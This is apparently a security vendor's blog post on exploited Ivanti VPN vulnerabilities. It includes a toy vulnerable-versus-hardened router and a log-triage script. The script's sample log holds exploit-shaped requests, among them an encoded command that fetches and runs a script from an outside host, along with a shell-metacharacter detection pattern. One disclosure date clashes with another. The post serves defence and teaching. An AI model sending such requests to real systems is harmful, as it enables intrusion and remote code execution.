Earlier this month, Cybersixgill detected reports regarding the exploitation of newly uncovered security vulnerabilities within Ivanti's offerings, specifically CVE-2024-21887 and CVE-2024-21893. These vulnerabilities are being actively exploited, with Cybersixgill uncovering proof-of-concept examples on GitHub. The security flaws in question impact Ivanti's Connect Secure VPN and Policy Secure network access control (NAC) devices, with reports indicating widespread exploitation of at least one of these vulnerabilities.
Ivanti disclosed CVE-2024-21887 (together with CVE-2023-46805) on 10 January 2024 and released a temporary mitigation ahead of patches; CVE-2024-21893 followed on 31 January. The mitigation did not hold: attackers found a way around it and continued exploiting the appliances.
Ivanti describes CVE-2024-21893 as a server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure and Ivanti Policy Secure that allows an attacker to access certain restricted resources without authentication, and CVE-2024-21887 as a command injection vulnerability in the web components of the same products that allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the affected appliance. Mitigation measures have been provided for both.
Behind The Headline
CVE-2024-21893 is a server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x), Ivanti Policy Secure (9.x, 22.x) and Ivanti Neurons for ZTA. It allows an attacker to access certain restricted resources without authentication. The CVE has a DVE score of 9.12, indicating a high chance of exploitation. Cybersixgill's data links it to threat actors including Volt Typhoon, QUILTED TIGER, Kimsuky, Killnet and Sofacy.
The current CVSS score for CVE-2024-21893 is 8.2. It was reported on 10th February 2024 and is trending on Twitter, in the cyber underground and on GitHub. It is also known to be exploited in the wild.
A server-side request forgery lets an attacker make the server issue HTTP requests of the attacker's choosing. Here the vulnerable SAML endpoint is reachable without a session, and the requests it issues originate from the appliance itself, so they can reach web routes that are otherwise available only to an authenticated administrator or to the appliance's own loopback interface. This is what undermined the January mitigation: it blocked external access to the request paths used by the earlier exploit chain, but a request the appliance makes to itself through the SAML component reached an internal web service that was still exposed to the CVE-2024-21887 command injection, giving command execution without credentials. The practical impact is therefore not impersonating logged-in users but reaching internal services as the appliance, which bypasses the authentication gate in front of them.
CVE-2024-21887 is a command injection vulnerability that affects Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure. It allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the affected appliance. On its own it requires admin credentials, but when chained with CVE-2023-46805, an authentication bypass in the same web component that lets a remote attacker reach restricted resources by sidestepping the access-control checks, no authentication is needed: the bypass reaches the injectable endpoint, and the injection runs the attacker's commands.
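The chain just described (a request that skips authentication reaching a handler that builds a shell command from attacker-controlled input) is easiest to understand as code. The following is an added example, not Ivanti's code and not derived from its firmware: the route names `/api/public/` and `/api/admin/keys-status/`, the `licence-check` helper and the order of checks are hypothetical placeholders chosen to reproduce the two defects side by side with a hardened version of the same router.

```python
"""Toy model of an unauthenticated-to-command-execution chain.

Added example, not Ivanti code. The route names ('/api/public/',
'/api/admin/keys-status/'), the licence-check helper and the check order are
hypothetical; they exist only to show the two defects that make such a chain
possible:
  1. the authentication exemption is decided on the raw request path, but the
     router dispatches on the normalised path, so a traversal sequence that
     starts under an exempt prefix lands on an authenticated route;
  2. the authenticated handler splices a URL parameter into a shell command.
"""
import posixpath

UNAUTHENTICATED_PREFIXES = ("/api/public/",)   # hypothetical: no session needed
ADMIN_ROUTE = "/api/admin/keys-status/"        # hypothetical: admin-only handler


class Denied(Exception):
    """Raised when the router refuses a request."""


def vulnerable_dispatch(path: str, authenticated: bool) -> str:
    """Return the shell command line the appliance would run for this request.

    Defect 1: the exemption check sees the raw path, the route match sees the
    normalised one. Defect 2: the result is a string handed to a shell.
    """
    if not authenticated and not path.startswith(UNAUTHENTICATED_PREFIXES):
        raise Denied("login required")
    normalised = posixpath.normpath(path)       # collapses '..' and '//'
    if normalised.startswith(ADMIN_ROUTE):
        arg = normalised[len(ADMIN_ROUTE):]     # attacker-controlled text
        return f"/opt/bin/licence-check {arg}"  # a ';' here ends the command
    raise Denied("no such route")


def hardened_dispatch(path: str, authenticated: bool) -> list:
    """Same router with both defects fixed; returns an argv list, never a string."""
    normalised = posixpath.normpath(path)
    if normalised != path:                       # refuse any non-canonical path
        raise Denied("non-canonical path")       # ('..', '//', trailing '/')
    if not authenticated and not normalised.startswith(UNAUTHENTICATED_PREFIXES):
        raise Denied("login required")
    if normalised.startswith(ADMIN_ROUTE):
        arg = normalised[len(ADMIN_ROUTE):]
        if not arg.isalnum():                    # allowlist, no metacharacters
            raise Denied("bad parameter")
        return ["/opt/bin/licence-check", arg]   # run with subprocess.run(argv)
    raise Denied("no such route")


def compare(path: str, authenticated: bool) -> dict:
    """Run both routers on one request and report what each would do."""
    outcome = {}
    for name, router in (("vulnerable", vulnerable_dispatch),
                         ("hardened", hardened_dispatch)):
        try:
            outcome[name] = ("run", router(path, authenticated))
        except Denied as exc:
            outcome[name] = ("denied", str(exc))
    return outcome


if __name__ == "__main__":
    # Unauthenticated request that walks from the exempt prefix into the admin
    # route and appends a second shell command.
    attack = "/api/public/../admin/keys-status/;id"
    print(compare(attack, authenticated=False))
    # Legitimate admin request.
    print(compare("/api/admin/keys-status/abc123", authenticated=True))
```

The two fixes are independent and both are needed: canonicalising before the authorisation decision closes the bypass, and passing an allowlisted argument as a separate argv element (never through a shell) closes the injection. Fixing only the first still leaves any legitimately authenticated administrator, or any future bypass, one `;` away from command execution, which is exactly the situation the chain with CVE-2023-46805 exposed.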
Mitigation measures should be applied immediately to protect against CVE-2024-21887 and CVE-2023-46805. Ivanti has provided detailed instructions on their advisory site on how to apply the necessary mitigations. Patch releases are being launched in a staggered schedule, with the first version made available to customers the week of 22nd January and the final version the week of 19th February.
The current CVSS score for CVE-2024-21887 is 9.1, which is critical on the CVSS v3 scale. The base score reflects impact, not exploitation activity: a command injection gives the attacker arbitrary command execution on the appliance, and from there unauthorized access, data theft or further compromise of the network behind it. Active exploitation by threat actors is a separate signal, and it is the reason the vulnerability poses a real and immediate risk rather than a scheduled-patching item.
Exploiting CVE-2024-21887 lets an authenticated administrator execute arbitrary commands on the affected appliance and so take complete control of it, with the potential for unauthorized access, data manipulation or disruption of services. Because it chains with other vulnerabilities that remove the authentication requirement, the potential for widespread attacks is significantly higher than the "authenticated administrator" precondition on its own suggests.
The vulnerability is linked to several threat groups, among them ransomware operations (RA Group, Rancoz, Rhysida) as well as FIN11 and UAC-0050, indicating interest from financially motivated as well as other capable actors. It is also worth noting that a Proof of Concept (PoC) exploit and a Metasploit module are publicly available, which lowers the skill required to exploit it.
Exploitation in the wild
Exploitation began before Ivanti's advisory and before any public PoC existed, so the initial operators had their own exploit code; since then, public PoCs and the Metasploit module have widened the pool of attackers able to exploit unpatched appliances. Users should apply the patches and updates provided by Ivanti without delay, as the risk of exploitation is high.
The initial exploitation of these vulnerabilities has been attributed to a suspected Chinese state-sponsored actor engaged in espionage, which targeted a wide range of industries.
The attackers installed webshells and backdoors on compromised appliances, harvested configuration data and credentials from them, and modified legitimate files on the device to evade detection.
The number of compromised systems is believed to be significant, with reports indicating that thousands of Ivanti Connect Secure and Policy Secure VPN appliances have been affected. The compromised systems are spread across multiple countries.
Ivanti's initial mitigation was bypassed using CVE-2024-21893, the SSRF disclosed after the first two vulnerabilities, and exploitation continued. This highlights the sophistication and persistence of the threat actors involved.
Mitigating risk
To mitigate the risk of exploitation, organizations running affected versions of Ivanti products should apply the vendor's patches; where a patch is not yet available for their version, they should apply Ivanti's mitigation and track the staggered release schedule. Because exploitation preceded the advisory, patching alone does not establish that an appliance is clean. Ivanti's guidance is to run the external Integrity Checker Tool (the in-built one can be subverted by an attacker who already controls the device), to factory-reset the appliance before applying the patch, and to rotate credentials, keys and certificates stored on it, since an attacker with command execution could have read them. Stay updated with the latest security advisories from Ivanti and relevant cybersecurity agencies and follow their recommended steps.
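Alongside the vendor's integrity checks, it is worth triaging the appliance's web access logs for the two request shapes discussed above: a path-traversal sequence that walks from an unauthenticated route into an authenticated one, and shell metacharacters inside a URL path. The script below is an added example, not a vendor signature or Ivanti's own detection: the log lines are constructed in Apache-style common log format, and the `/api/public/` and `/api/admin/` prefixes are placeholders for whatever routes a given appliance exempts from and requires authentication for. It goes slightly beyond the text by decoding percent-encoding first, so an encoded `%2e%2e` or `%3b` is caught as well as the literal form.

```python
"""Heuristic triage of web-access log lines for traversal-into-authenticated-route
and shell-metacharacter request shapes.

Added example, not a vendor signature. Log lines are constructed; the
'/api/public/' and '/api/admin/' prefixes are placeholders.
"""
import posixpath
import re
from urllib.parse import unquote

# Apache-style common log format: ip ident user [ts] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Characters that end or chain a command when a URL segment reaches a shell.
SHELL_META = re.compile(r"[;|`&]|\$\(|\n")
PUBLIC_PREFIXES = ("/api/public/",)   # assumed: reachable without a session
PRIVATE_PREFIXES = ("/api/admin/",)   # assumed: require authentication

# Constructed sample log: a probe, two exploit-shaped requests (one literal,
# one percent-encoded), a legitimate admin call and noise.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Feb/2024:08:01:10 +0000] "GET /api/public/status HTTP/1.1" 200 512
203.0.113.7 - - [12/Feb/2024:08:01:11 +0000] "GET /api/public/../admin/keys-status/;id HTTP/1.1" 200 91
203.0.113.7 - - [12/Feb/2024:08:01:12 +0000] "GET /api/public/%2e%2e/admin/keys-status/%3bcurl%20http%3a%2f%2f198.51.100.9%2fx%7csh HTTP/1.1" 200 91
198.51.100.22 - - [12/Feb/2024:08:02:00 +0000] "POST /api/admin/keys-status/abc123 HTTP/1.1" 200 88
198.51.100.22 - - [12/Feb/2024:08:02:01 +0000] "GET /favicon.ico HTTP/1.1" 404 0
"""


def analyse_target(target: str) -> list:
    """Return the reasons a request target matches this exploit class (empty if none)."""
    path = unquote(target.split("?", 1)[0])   # drop query string, decode once
    reasons = []
    if ".." in path.split("/"):                # raw path still contains traversal
        reasons.append("traversal")
        canonical = posixpath.normpath(path)   # what the router would dispatch on
        if path.startswith(PUBLIC_PREFIXES) and canonical.startswith(PRIVATE_PREFIXES):
            reasons.append("public-to-private")
    if SHELL_META.search(path):
        reasons.append("shell-metachar")
    return reasons


def triage(log_text: str) -> list:
    """Parse log lines and return a record for each one that looks suspicious."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                            # unparseable line: skip, do not crash
        reasons = analyse_target(m["target"])
        if reasons:
            hits.append({"ip": m["ip"], "ts": m["ts"], "target": m["target"],
                         "status": int(m["status"]), "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG):
        print(hit["ts"], hit["ip"], hit["status"], ",".join(hit["reasons"]), hit["target"])
```

A "public-to-private" hit with a 200 response is the strongest signal, because it means the authenticated route answered a request that never presented a session. Treat any hit as a reason to run the external integrity check and preserve the logs before the device is reset, not as a finding on its own: the heuristics are deliberately broad and will also flag scanners that never got past the front door.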